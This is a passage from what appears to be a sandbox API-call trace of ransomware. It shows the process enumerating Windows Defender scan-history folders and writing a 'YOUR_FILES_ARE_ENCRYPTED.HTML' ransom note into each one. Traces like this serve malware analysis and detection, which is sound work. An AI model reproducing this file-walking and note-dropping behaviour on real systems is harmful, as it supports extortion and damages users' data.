lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.649] CloseHandle (hObject=0x308) returned 1 [0107.650] GetProcessHeap () returned 0x600000 [0107.650] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.650] GetProcessHeap () returned 0x600000 [0107.650] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.651] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="18", cAlternateFileName="")) returned 1 [0107.651] StrStrIW (lpFirst="18", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.651] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18") returned 79 [0107.651] GetProcessHeap () returned 0x600000 [0107.651] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.653] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18" [0107.653] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*" [0107.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.653] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.653] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="107001", cAlternateFileName="")) returned 1 [0107.653] StrStrIW (lpFirst="107001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.653] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\107001") returned 86 [0107.653] PathFindExtensionW (pszPath="107001") returned="" [0107.654] lstrlenW (lpString="") returned 0 [0107.654] PathFindExtensionW (pszPath="107001") returned="" [0107.654] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="107002", cAlternateFileName="")) returned 1 [0107.654] StrStrIW (lpFirst="107002", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.654] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\107002") returned 86 [0107.654] PathFindExtensionW (pszPath="107002") returned="" [0107.654] lstrlenW (lpString="") returned 0 [0107.654] PathFindExtensionW (pszPath="107002") returned="" [0107.654] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109002", cAlternateFileName="")) returned 1 [0107.654] StrStrIW (lpFirst="109002", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.654] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\109002") returned 86 [0107.654] PathFindExtensionW (pszPath="109002") returned="" [0107.654] lstrlenW (lpString="") returned 0 [0107.654] PathFindExtensionW (pszPath="109002") returned="" [0107.654] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="195", cAlternateFileName="")) returned 1 [0107.654] StrStrIW (lpFirst="195", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.654] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\195") returned 83 [0107.654] PathFindExtensionW (pszPath="195") returned="" [0107.654] lstrlenW (lpString="") returned 0 [0107.654] PathFindExtensionW (pszPath="195") returned="" [0107.654] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="195", cAlternateFileName="")) returned 0 [0107.654] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.654] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.654] GetProcessHeap () returned 0x600000 [0107.655] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.656] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\18\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.657] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.658] CloseHandle (hObject=0x308) returned 1 [0107.659] GetProcessHeap () returned 0x600000 [0107.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.659] GetProcessHeap () returned 0x600000 [0107.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.660] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="19", cAlternateFileName="")) returned 1 [0107.660] StrStrIW (lpFirst="19", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.660] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19") returned 79 [0107.660] GetProcessHeap () returned 0x600000 [0107.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.661] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19" [0107.661] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*" [0107.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="15038", cAlternateFileName="")) returned 1 [0107.662] StrStrIW (lpFirst="15038", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.662] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\15038") returned 85 [0107.662] PathFindExtensionW (pszPath="15038") returned="" [0107.662] lstrlenW (lpString="") returned 0 [0107.662] PathFindExtensionW (pszPath="15038") returned="" [0107.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="266", cAlternateFileName="")) returned 1 [0107.662] StrStrIW (lpFirst="266", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.662] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\266") returned 83 [0107.662] PathFindExtensionW (pszPath="266") returned="" [0107.662] lstrlenW (lpString="") returned 0 [0107.662] PathFindExtensionW (pszPath="266") returned="" [0107.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="272", cAlternateFileName="")) returned 1 [0107.662] StrStrIW (lpFirst="272", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.663] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\272") returned 83 [0107.663] PathFindExtensionW (pszPath="272") returned="" [0107.663] lstrlenW (lpString="") returned 0 [0107.663] PathFindExtensionW (pszPath="272") returned="" [0107.663] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="328", cAlternateFileName="")) returned 1 [0107.663] StrStrIW (lpFirst="328", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.663] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\328") returned 83 [0107.663] PathFindExtensionW (pszPath="328") returned="" [0107.663] lstrlenW (lpString="") returned 0 [0107.663] PathFindExtensionW (pszPath="328") returned="" [0107.663] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="328", cAlternateFileName="")) returned 0 [0107.663] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.663] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.663] GetProcessHeap () returned 0x600000 [0107.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\19\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\19\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.664] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.665] CloseHandle (hObject=0x308) returned 1 [0107.666] GetProcessHeap () returned 0x600000 [0107.666] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.666] GetProcessHeap () returned 0x600000 [0107.666] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.667] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="20", cAlternateFileName="")) returned 1 [0107.667] StrStrIW (lpFirst="20", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.667] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20") returned 79 [0107.667] GetProcessHeap () returned 0x600000 [0107.667] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.669] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20" [0107.669] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*" [0107.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.669] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.670] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="189", cAlternateFileName="")) returned 1 [0107.670] StrStrIW (lpFirst="189", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.670] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\189") returned 83 [0107.670] PathFindExtensionW (pszPath="189") returned="" [0107.670] lstrlenW (lpString="") returned 0 [0107.670] PathFindExtensionW (pszPath="189") returned="" [0107.670] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="189", cAlternateFileName="")) returned 0 [0107.670] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.670] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.670] GetProcessHeap () returned 0x600000 [0107.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\20\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\20\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.671] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.672] CloseHandle (hObject=0x308) returned 1 [0107.673] GetProcessHeap () returned 0x600000 [0107.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.673] GetProcessHeap () returned 0x600000 [0107.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.674] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="21", cAlternateFileName="")) returned 1 [0107.674] StrStrIW (lpFirst="21", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.674] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21") returned 79 [0107.674] GetProcessHeap () returned 0x600000 [0107.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.675] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21" [0107.675] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*" [0107.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\*", lpFindFileData=0x19deb0 | out: 